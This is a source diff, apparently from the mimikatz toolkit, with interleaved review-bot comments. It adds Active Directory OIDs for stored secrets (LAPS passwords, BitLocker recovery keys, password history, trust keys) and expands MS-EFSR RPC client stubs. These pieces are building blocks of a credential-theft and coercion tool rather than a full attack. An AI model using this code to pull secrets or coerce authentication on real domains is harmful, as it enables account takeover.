#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
// bitlocker
#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
// LAPS
#define szOID_ANSI_msMcsAdmPwd "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.1"
#define szOID_ANSI_msMcsAdmPwdExpirationTime "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.2"
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
@ -257,8 +267,10 @@ void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTa
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);
LPWSTR kull_m_rpc_drsr_MakeSpnWithGUID(LPCGUID ServClass, LPCWSTR ServName, LPCGUID InstName);
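Review bot: The two OIDs under `// LAPS` are the ms-Mcs-AdmPwd / ms-Mcs-AdmPwdExpirationTime attributes of the legacy Microsoft LAPS schema extension, and the bare comment invites readers to assume it covers every LAPS deployment; as far as I know the newer built-in Windows LAPS stores its data in a separate msLAPS-* attribute set that is not listed here, so the comment should say which flavour is meant. Suggest `// LAPS (legacy ms-Mcs-AdmPwd schema extension; the built-in Windows LAPS msLAPS-* attributes are not covered here)`. Similarly the BitLocker block would benefit from naming the attributes, e.g. `// BitLocker recovery information (ms-FVE-RecoveryPassword, ms-FVE-RecoveryGuid, ms-FVE-VolumeGuid, ms-FVE-KeyPackage)`, since the numeric OIDs alone are opaque.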


@ -1,11 +1,27 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "kull_m_rpc.h"
const UUID EFSR_ObjectUUID;
extern const UUID EFSR_ObjectUUID;
typedef void *PEXIMPORT_CONTEXT_HANDLE;
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags);
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext);
typedef struct pipe_EFS_EXIM_PIPE {
void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
char* state;
} EFS_EXIM_PIPE;
extern RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
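Review bot: The header now exposes a MIDL pipe type and six client stubs with no comment tying them to the interface they drive, and the `CHAR* state` callback contract of EFS_EXIM_PIPE is not obvious to a caller. Suggest a comment above the typedef, `// MIDL pipe used by EfsRpcReadFileRaw (out pipe) and EfsRpcWriteFileRaw (in pipe): the caller supplies pull/push/alloc and an opaque state pointer that the RPC runtime passes back to them during the call`, with the pull/push split hedged as "presumably" until checked against the runtime, and a file-level comment `// Client stubs for MS-EFSR (c681d488-d850-11d0-8c52-00c04fd90f7e v1.0), opnums 0-5` so the UUID in the .c file has a named owner. The switch of EFSR_ObjectUUID and efsrpc_v1_0_c_ifspec to `extern` is the right fix for what were previously definitions in a header.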


@ -1,75 +1,104 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_ms-efsr.h"
const UUID EFSR_ObjectUUID = {0xdf1941c5, 0xfe89, 0x4e79, {0xbf, 0x10, 0x46, 0x36, 0x57, 0xac, 0xf4, 0x4d}};
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[23];
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
UCHAR Format[93];
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
{
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], binding_h, hContext, FileName, Flags).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
{
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[54], hContext);
}
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x08, 0x00,
0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
}};
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
}};
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[283];
#elif defined(_M_IX86)
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[23];
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[271];
#endif
extern const UCHAR ms2Defsr__MIDL_TypeFormatString[55];
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
UCHAR Format[89];
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, NDR_TSI_20, 0, 0, NULL, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)&efsrpc___RpcClientInterface;
RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *)& efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#pragma optimize("", off)
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
{
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], (unsigned char *) &binding_h).Simple;
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, binding_h, hContext, FileName, Flags).Simple;
}
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 54, hContext, EfsOutPipe).Simple;
}
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 104, hContext, EfsInPipe).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext)
{
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 154, hContext);
}
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 192, binding_h, FileName).Simple;
}
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 234, binding_h, FileName, OpenFlag).Simple;
}
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00,
0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x08, 0x00,
0x18, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x08, 0x00, 0x26, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,
0x03, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00,
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01,
0x08, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x0a, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00,
};
#elif defined(_M_IX86)
#pragma optimize("", off)
#pragma warning(push)
#pragma warning(disable:4100)
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
{
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, &binding_h).Simple;
}
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 52, &hContext).Simple;
}
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 100, &hContext).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
{
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[52], (unsigned char *) &hContext);
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 148, &hContext);
}
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 184, &binding_h).Simple;
}
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
{
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 224, &binding_h).Simple;
}
#pragma warning(pop)
#pragma optimize("", on)
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00,
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
}};
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
}};
#endif
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x30, 0x40,
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x04, 0x00, 0x18, 0x00, 0x70, 0x00,
0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0c, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x04, 0x00, 0x26, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x0c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00,
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x10, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00,
0x0c, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00,
};
#endif
const UCHAR ms2Defsr__MIDL_TypeFormatString[] = {
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x30, 0x41, 0x00, 0x00, 0x11, 0x04, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00,
0x11, 0x00, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
};